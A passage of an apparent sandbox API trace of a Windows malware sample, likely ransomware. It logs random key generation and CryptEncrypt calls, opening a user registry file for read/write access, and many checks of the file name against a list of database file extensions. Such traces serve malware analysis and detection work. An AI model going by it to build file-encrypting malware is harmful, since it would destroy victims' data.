[0147.602] GetProcessHeap () returned 0xea0000 [0147.602] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0147.602] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec3658 | out: hHeap=0xea0000) returned 1 [0147.602] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d30 | out: hHeap=0xea0000) returned 1 [0147.602] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0147.602] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0147.602] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0147.603] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms")) returned 0x26 [0147.606] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0147.607] GetLastError () returned 0x0 [0147.607] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=524288) returned 1 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".4dd") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".4dl") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accdb") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accdc") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accde") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accdr") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accdt") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".accft") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".adb") returned 0x0 [0147.607] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ade") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".adf") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".adp") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".arc") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ora") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".alf") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ask") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".btr") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".bdf") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".cat") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".cdb") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ckp") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".cma") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".cpd") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dacpac") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dad") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dadiagrams") returned 0x0 [0147.608] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".daschema") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".db") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".db-shm") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".db-wal") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".db3") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dbc") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dbf") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dbs") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dbt") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dbv") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dbx") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dcb") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dct") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dcx") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ddl") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dlis") returned 0x0 [0147.609] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dp1") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dqy") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dsk") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dsn") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dtsx") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dxl") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".eco") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ecx") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".edb") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".epim") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".exb") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fcd") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fdb") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fic") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fmp") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fmp12") returned 0x0 [0147.610] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fmpsl") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fol") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fp3") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fp4") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fp5") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fp7") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".fpt") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".frm") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".gdb") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".grdb") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".gwi") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".hdb") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".his") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ib") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".idb") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ihx") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".itdb") returned 0x0 [0147.611] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".itw") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".jet") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".jtx") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".kdb") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".kexi") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".kexic") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".kexis") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".lgc") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".lwx") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".maf") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".maq") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mar") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mas") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mav") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mdb") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mdf") returned 0x0 [0147.612] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mpd") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mrg") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mud") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".mwb") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".myd") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ndf") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nnt") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nrmlib") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ns2") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ns3") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".ns4") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nsf") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nv") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nv2") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nwdb") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".nyf") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".odb") returned 0x0 [0147.613] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".oqy") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".orx") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".owc") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".p96") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".p97") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".pan") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".pdb") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".pdm") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".pnz") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".qry") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".qvd") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rbf") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rctd") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rod") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rodx") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rpd") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rsd") returned 0x0 [0147.614] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sas7bdat") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sbf") returned 0x0 [0147.615] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".scx") returned 0x0 [0147.615] StrStrIW 